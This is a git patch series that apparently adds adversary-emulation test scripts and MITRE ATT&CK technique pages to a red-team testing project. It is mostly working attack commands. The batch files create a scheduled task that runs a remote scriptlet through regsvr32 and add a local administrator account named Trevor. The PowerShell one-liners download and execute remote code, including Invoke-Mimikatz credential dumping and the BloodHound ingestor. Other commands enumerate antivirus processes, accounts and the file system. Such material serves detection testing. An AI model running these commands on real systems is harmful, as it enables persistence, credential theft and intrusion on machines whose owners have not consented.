From 2e4ff79e6638fd20649096a79e766bda94f0c89c Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Tue, 7 Nov 2017 15:49:28 -0800
Subject: [PATCH 1/6] Chain reaction

Basic Chain reaction
---
 .../Chain_Reactions/chain_reaction_01.bat     | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 ARTifacts/Chain_Reactions/chain_reaction_01.bat

diff --git a/ARTifacts/Chain_Reactions/chain_reaction_01.bat b/ARTifacts/Chain_Reactions/chain_reaction_01.bat
new file mode 100644
index 00000000..428d246d
--- /dev/null
+++ b/ARTifacts/Chain_Reactions/chain_reaction_01.bat
@@ -0,0 +1,33 @@
+:: Chain Reaction 01
+::
+:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
+:: NOTE We recommend executing from a server that you control.
+:: NOTE Thank You :)
+:: This particular Chain Reaction focuses on generating event noise.
+
+:: Tactics: Persistence, Defense Evasion
+:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
+:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
+:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
+
+SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
+
+:: Tactic: Discovery
+:: Execution: https://attack.mitre.org/wiki/Technique/T1086
+:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
+
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > output.txt
+
+:: Tactic: Credential Access
+:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
+:: Add a user, then add to group
+
+Net user /add Trevor SmshBgr123
+
+:: Add user to group
+
+net localgroup administrators Trevor /add
+
+ECHO Well that was fun!
+
+pause

From e843ca71e7e2eb5fd1c63714800ea4443424bf63 Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Wed, 8 Nov 2017 22:19:10 -0800
Subject: [PATCH 2/6] Linux

+ Add Account Discovery
+ Fix Cron Job title
---
 Linux/Discovery/Account_Discovery.md | 17 +++++++++++++++++
 Linux/Persistence/Cron_Job.md        |  2 +-
 2 files changed, 18 insertions(+), 1 deletion(-)
 create mode 100644 Linux/Discovery/Account_Discovery.md

diff --git a/Linux/Discovery/Account_Discovery.md b/Linux/Discovery/Account_Discovery.md
new file mode 100644
index 00000000..307df472
--- /dev/null
+++ b/Linux/Discovery/Account_Discovery.md
@@ -0,0 +1,17 @@
+# Account Discovery
+
+MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087)
+
+List of all accounts:
+
+    cat /etc/passwd
+
+Currently logged in:
+
+Local:
+
+    finger
+
+Remote:
+
+    finger @<computer_name>
diff --git a/Linux/Persistence/Cron_Job.md b/Linux/Persistence/Cron_Job.md
index bd2891b4..09435f6a 100644
--- a/Linux/Persistence/Cron_Job.md
+++ b/Linux/Persistence/Cron_Job.md
@@ -1,4 +1,4 @@
-# Bash History
+# Cron Job
 
 MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
 

From 705f7d4dcf7c126a6d30cb31b6e2406db891ad25 Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Fri, 10 Nov 2017 13:52:27 -0800
Subject: [PATCH 3/6] Powershell - Bloodhound

Added single command to download and execute Bloodhound.
---
 Windows/Execution/PowerShell.md | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/Windows/Execution/PowerShell.md b/Windows/Execution/PowerShell.md
index fe138955..54085c5b 100644
--- a/Windows/Execution/PowerShell.md
+++ b/Windows/Execution/PowerShell.md
@@ -6,6 +6,10 @@ MITRE ATT&CK Technique: [T1086](https://attack.mitre.org/wiki/Technique/T1086)
 
     powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
 
+### Download and Execute BloodHound
+
+    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
+
 ### Download Mimikatz and Dump credentials
 
 Just download it:

From 26854f24b0ebdae3614f946d1eb2f7f6a06f150a Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Mon, 13 Nov 2017 05:01:03 -0800
Subject: [PATCH 4/6] System Network Configuration Discovery

+ Added System Network Configuration Discovery
---
 .../System_Network_Configuration_Discovery.md | 26 +++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 Windows/Discovery/System_Network_Configuration_Discovery.md

diff --git a/Windows/Discovery/System_Network_Configuration_Discovery.md b/Windows/Discovery/System_Network_Configuration_Discovery.md
new file mode 100644
index 00000000..074903c2
--- /dev/null
+++ b/Windows/Discovery/System_Network_Configuration_Discovery.md
@@ -0,0 +1,26 @@
+# System Network Configuration Discovery
+
+MITRE ATT&CK Technique: [T1016](https://attack.mitre.org/wiki/Technique/T1016)
+
+
+##
+
+Input:
+
+    ipconfig /all
+
+Input:
+
+    netsh interface show
+
+Input:
+
+    arp -a
+
+Input:
+
+    nbtstat -n
+
+Input:
+
+    net config

From 61d4797e64718b31cc282a00e8046532f9213790 Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Mon, 13 Nov 2017 11:01:57 -0700
Subject: [PATCH 5/6] Chain Reaction

+ New chain reaction
---
 .../Chain_Reactions/chain_reaction_02.bat     | 56 +++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 ARTifacts/Chain_Reactions/chain_reaction_02.bat

diff --git a/ARTifacts/Chain_Reactions/chain_reaction_02.bat b/ARTifacts/Chain_Reactions/chain_reaction_02.bat
new file mode 100644
index 00000000..b5889e36
--- /dev/null
+++ b/ARTifacts/Chain_Reactions/chain_reaction_02.bat
@@ -0,0 +1,56 @@
+:: Chain Reaction 02
+::
+:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
+:: NOTE We recommend executing from a server that you control.
+:: NOTE Thank You :)
+::
+:: This particular Chain Reaction focuses on enumeration.
+
+:: Tactic: Discovery
+:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
+:: Change IP scheme for your environment
+
+:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
+
+net.exe view
+
+net.exe view /domain
+
+:: Tactic: Discovery
+:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
+
+net localgroup "administrators"
+
+wmic useraccount get /ALL
+
+
+:: Tactic: Discovery
+:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
+
+netsh.exe advfirewall firewall show all profiles
+
+tasklist.exe | findstr cb
+
+tasklist.exe | findstr virus
+
+tasklist.exe | findstr defender
+
+:: Execution
+
+:: Tactic: Discovery
+:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
+
+ipconfig /all
+arp -a
+nbtstat -n
+
+:: Tactic: Discovery
+:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
+
+dir /s c:\ >> %temp%\download
+
+:: Tactic: Execution
+:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
+:: Download and invoke BloodHound Ingestor
+
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"

From 407c84b6f5151c24641525975f7d638518e4ec8f Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Mon, 13 Nov 2017 11:02:39 -0700
Subject: [PATCH 6/6] Discovery Updates

+ More Tasklist.exe adds
+ Modified file directory listing to be recursive.
---
 .../Discovery/File_and_Directory_Discovery.md    |  8 ++++----
 Windows/Discovery/Security_Software_Discovery.md | 16 +++++++++++++++-
 2 files changed, 19 insertions(+), 5 deletions(-)

diff --git a/Windows/Discovery/File_and_Directory_Discovery.md b/Windows/Discovery/File_and_Directory_Discovery.md
index 23b7aef2..b4402478 100644
--- a/Windows/Discovery/File_and_Directory_Discovery.md
+++ b/Windows/Discovery/File_and_Directory_Discovery.md
@@ -6,7 +6,7 @@ MITRE ATT&CK Technique: [T1083](https://attack.mitre.org/wiki/Technique/T1083)
 
 Input:
 
-    dir c:\ >> %temp%\download
-    dir "c:\Documents and Settings" >> %temp%\download
-    dir "c:\Program Files\" >> %temp%\download
-    dir d:\ >> %temp%\download
+    dir /s c:\ >> %temp%\download
+    dir /s "c:\Documents and Settings" >> %temp%\download
+    dir /s "c:\Program Files\" >> %temp%\download
+    dir /s d:\ >> %temp%\download
diff --git a/Windows/Discovery/Security_Software_Discovery.md b/Windows/Discovery/Security_Software_Discovery.md
index 8054c405..4843654d 100644
--- a/Windows/Discovery/Security_Software_Discovery.md
+++ b/Windows/Discovery/Security_Software_Discovery.md
@@ -4,12 +4,26 @@ MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1063)
 
 ### netsh
 
-    netsh.exe advfirewall firewall
+    netsh.exe advfirewall firewall show all profiles
 
 ### tasklist
 
+Input:
+
     tasklist.exe
 
+Input:
+
+    tasklist.exe | findstr virus
+
+Input:
+
+    tasklist.exe | findstr cb
+
+Input:
+
+    tasklist.exe | findstr defender
+
 
 ### PowerShell